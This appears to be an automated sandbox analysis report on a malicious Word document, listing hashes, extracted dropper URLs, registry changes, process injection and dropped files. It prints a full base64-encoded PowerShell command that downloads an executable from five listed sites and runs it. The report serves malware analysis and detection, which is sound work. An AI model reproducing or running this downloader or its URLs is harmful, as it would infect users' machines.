d07bbf9636c223b83dfe333c0428b41b909c19321e5f208bb805a2869cb358d5

Analysis

max time kernel
100s
max time network
118s
platform
windows7_x64
resource
win7-20231129-en
resource tags

arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
submitted
16-05-2024 12:51

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

4b290e4a9c72a8ccb01a945a516d06e8_JaffaCakes118.doc
Size

134KB
MD5

4b290e4a9c72a8ccb01a945a516d06e8
SHA1

459ec7d526faf4138ee50a0899c8f385e9df037c
SHA256

d07bbf9636c223b83dfe333c0428b41b909c19321e5f208bb805a2869cb358d5
SHA512

17d3bd4060dd8b5f1b57f9cf03741cdfb443e8226cdfbffff32059d3ae8c74a6556ed20658776fc2aef6df8eece7fab1334e7bfeafc1bea0d0579fb65b0ada09
SSDEEP

3072:FkGBPFJjA948rgSPj/5hyxXO+FMv3V1BUo62Yzs3oFAYxPxTqf7p1ftmZS:FkGBPFJjA94Vkj+xh+vTCoAs3oRPxTqc

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://www.studiomovil.com.mx/wp-content/erRpJAmInz/

exe.dropper

http://krzewy-przemysl.pl/wp-includes/yf1etsmsp_esqjtujn-589/

exe.dropper

http://laalpina.cl/sisi/cncXoJaqj/

exe.dropper

http://aysotogaziantep.com/wp-content/DSovUnSbnf/

exe.dropper

http://www.noshnow.co.uk/ybzew/wMaxwSMC/

Signatures

Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.

Processes:

powershell.exe

description pid pid_target process target process

Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2336 948 powershell.exe
Blocklisted process makes network request 4 IoCs

Processes:

powershell.exe

flow pid process

5 2336 powershell.exe
6 2336 powershell.exe
8 2336 powershell.exe
10 2336 powershell.exe

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2336	948	powershell.exe

flow	pid	process
5	2336	powershell.exe
6	2336	powershell.exe
8	2336	powershell.exe
10	2336	powershell.exe

Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Drops file in Windows directory 1 IoCs

Processes:

WINWORD.EXE

description ioc process

File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE
Office loads VBA resources, possible macro or embedded object present

description	ioc	process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	WINWORD.EXE

Modifies Internet Explorer settings 1 TTPs 31 IoCs

adware spyware

Modify Registry

T1112

Processes:

WINWORD.EXE

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\MenuExt	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\Toolbar	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit"	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	WINWORD.EXE

Modifies registry class 64 IoCs

Processes:

WINWORD.EXE

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Wow6432Node\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcText"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Wow6432Node\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents3"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Wow6432Node\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}\ = "IDataAutoWrapper"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F}\ = "CommandButtonEvents"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon\ = "\"%1\""	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents7"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Wow6432Node\Interface\{92E11A03-7358-11CE-80CB-00AA00611080}\ = "Pages"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Wow6432Node\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Wow6432Node\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLTextArea"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Wow6432Node\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLImage"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3}\ = "MdcToggleButtonEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents9"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29}\ = "ControlEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Wow6432Node\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0}\ = "LabelControlEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Wow6432Node\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Wow6432Node\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLCheckbox"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\ShellEx	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Wow6432Node\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcList"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080}\ = "Tab"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Wow6432Node\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcOptionButton"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Wow6432Node\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0}	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3}\ = "MdcCheckBoxEvents"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\TypeLib\{16E6939D-0E3B-42E0-8277-07E17B3716F5}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}\ = "IReturnString"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080}\ = "Tabs"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohevi.dll"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Wow6432Node\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Wow6432Node\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

WINWORD.EXE

pid process

2268 WINWORD.EXE
Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

powershell.exe

pid process

2336 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 2336 powershell.exe
Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

WINWORD.EXE

pid process

2268 WINWORD.EXE
2268 WINWORD.EXE

pid	process
2268	WINWORD.EXE

pid	process
2336	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2336	powershell.exe

pid	process
2268	WINWORD.EXE
2268	WINWORD.EXE

Suspicious use of WriteProcessMemory 4 IoCs

Processes:

WINWORD.EXE

description	pid	process	target process
PID 2268 wrote to memory of 2228	2268	WINWORD.EXE	splwow64.exe
PID 2268 wrote to memory of 2228	2268	WINWORD.EXE	splwow64.exe
PID 2268 wrote to memory of 2228	2268	WINWORD.EXE	splwow64.exe
PID 2268 wrote to memory of 2228	2268	WINWORD.EXE	splwow64.exe

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\4b290e4a9c72a8ccb01a945a516d06e8_JaffaCakes118.doc"
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2268

C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
2⤵
PID:2228

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -encod JABCAHcAcwByAGoAdABvAD0AJwBaAHUAYgB2ADUAcQAxACcAOwAkAEEAagBqAHEAMwA2ACAAPQAgACcAMQA5ADEAJwA7ACQAQwBtADYAegBzAGMAPQAnAE8AYQBzAGQAcQA4AHoAcQAnADsAJABPAG8AagB1ADcAdgA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAQQBqAGoAcQAzADYAKwAnAC4AZQB4AGUAJwA7ACQAUQA0AGkAegBiAHYAaQAxAD0AJwBEAHAAagBqAHUAMgA4AGYAJwA7ACQAVwBpAGkAaQBvAHIAYwBzAD0ALgAoACcAbgBlAHcAJwArACcALQBvAGIAagBlACcAKwAnAGMAdAAnACkAIABOAGUAVAAuAHcAZQBiAGMATABpAEUAbgB0ADsAJABBAG8AbABpAGwAZAA9ACcAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AcwB0AHUAZABpAG8AbQBvAHYAaQBsAC4AYwBvAG0ALgBtAHgALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AZQByAFIAcABKAEEAbQBJAG4AegAvAEAAaAB0AHQAcAA6AC8ALwBrAHIAegBlAHcAeQAtAHAAcgB6AGUAbQB5AHMAbAAuAHAAbAAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAHkAZgAxAGUAdABzAG0AcwBwAF8AZQBzAHEAagB0AHUAagBuAC0ANQA4ADkALwBAAGgAdAB0AHAAOgAvAC8AbABhAGEAbABwAGkAbgBhAC4AYwBsAC8AcwBpAHMAaQAvAGMAbgBjAFgAbwBKAGEAcQBqAC8AQABoAHQAdABwADoALwAvAGEAeQBzAG8AdABvAGcAYQB6AGkAYQBuAHQAZQBwAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8ARABTAG8AdgBVAG4AUwBiAG4AZgAvAEAAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAG4AbwBzAGgAbgBvAHcALgBjAG8ALgB1AGsALwB5AGIAegBlAHcALwB3AE0AYQB4AHcAUwBNAEMALwAnAC4AIgBzAFAAbABgAGkAVAAiACgAJwBAACcAKQA7ACQAWgBmAHcAMABzAHYANwBhAD0AJwBDAGkAegBkAGYANQBvADUAJwA7AGYAbwByAGUAYQBjAGgAKAAkAE4AdwBqADIAMAByAGkAIABpAG4AIAAkAEEAbwBsAGkAbABkACkAewB0AHIAeQB7ACQAVwBpAGkAaQBvAHIAYwBzAC4AIgBkAG8AYAB3AG4AbABvAEEAYABkAGYAaQBgAGwAZQAiACgAJABOAHcAagAyADAAcgBpACwAIAAkAE8AbwBqAHUANwB2ACkAOwAkAEcAcgBpAGQAbwA3AHQAPQAnAE4AMQBrAGMAdABtAGIANgAnADsASQBmACAAKAAoACYAKAAnAEcAZQB0ACcAKwAnAC0ASQB0AGUAJwArACcAbQAnACkAIAAkAE8AbwBqAHUANwB2ACkALgAiAGwAZQBuAGAAZwBUAGgAIgAgAC0AZwBlACAAMgAzADAANgA4ACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAFMAYABUAGEAcgB0ACIAKAAkAE8AbwBqAHUANwB2ACkAOwAkAEwAOAB6AHUAOQBpAHMAMwA9ACcAVAAzADUANQBqADkAMgAnADsAYgByAGUAYQBrADsAJABQADIAdwBzAGkAMwBiAD0AJwBDADUAdwBqAHcAdQBrADkAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQATwA2AGkAcgA1AHIAPQAnAFkAOQBhAGkAYQBrAGsAJwA=
1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2336

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\18EAC810.wmf

Filesize
444B

MD5
e0d61ba3bd2ce4d8da5996efbdf0f6cc

SHA1
984542cf4677cfe447e34f27ece2201e9bcb1b6f

SHA256
e28aa0d2748315fce68d295364c917884f8f22a4e1940e8dd19a3cf2f5729e11

SHA512
736148da592b2e54eb00c430202184038e59d326585021f489c554050b38396ca4184619771fce87b764bd15d868f783c48eb2565f3b6b879fca4b0dd45a98ad

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2B708808.wmf

Filesize
444B

MD5
a672aa60d488ca5be869f5d5a940a87a

SHA1
b71c9a03cb401678fe37ee2e783b187671586c3f

SHA256
391eaf7a981993e7ffc057b456ebbbfc084fc6e4ef4f540f53723b9be47c4ca2

SHA512
a721ebf400f6a755de58f107f29aacba0e421a05e6902e7e29943e0ab22a9dafdfae6c2ccdbe596a2ff485fd9dd4161413d7263ae74165305fcb767efdc7aa04

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3643276E.wmf

Filesize
444B

MD5
e3400103f70790ffa81819eb753c13fd

SHA1
090941188ffee8a67384cdfaf82b39bc8f411d4f

SHA256
19014bb5987d2499d9d826520ebbe6a0ddb42e9723bce9752c8522577fa34731

SHA512
34d0610ce94e9793f30f91796a1504337e0980823d76de225a7815382eba63e924268f4c90d86ceca048c573049283731e8784ff546b676f021f5237ed890559

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3D1246A.wmf

Filesize
444B

MD5
3b5039c76b25d8358430788c4b23afb5

SHA1
a597a9fd12b45553aa561c5beadf1b37831f91d9

SHA256
64ce93d391895cece8a6d144c022790925c9d971b960aafc9206eb8308189c69

SHA512
12e08dbe22590c248c5459255e7f8a575fb73cd502a90b10320f4ffa22d1e2c24a87ede2d34fafb04f5bfff92c8b08a7adb60b950f759b26dcfd8c233cd10774

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4CFABE86.wmf

Filesize
444B

MD5
8adcb909b3077b30c9a6c2fd02460955

SHA1
d79a0e20324f7c6098f06db1b8a4fd86488a7128

SHA256
08b84b8e2a08169eb1382999a3c8262b095e38d756d590401bb5be188882480d

SHA512
529a8067453ec97475b53a443a8810159c30101610f14fb21799ee04fc2e2271f8e6449b12d809893c3d13765bd3401fd871087d3de635dc28b2e3787cc5249e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5E3E3260.wmf

Filesize
444B

MD5
608d2d4db9491bc579d68eaa98111922

SHA1
0810ebac249561ea00447933f80a16129dc4182d

SHA256
26cdc1f5385fbfca2f4ecd0623a13cbf231fb0d227be431b6988842653a9542a

SHA512
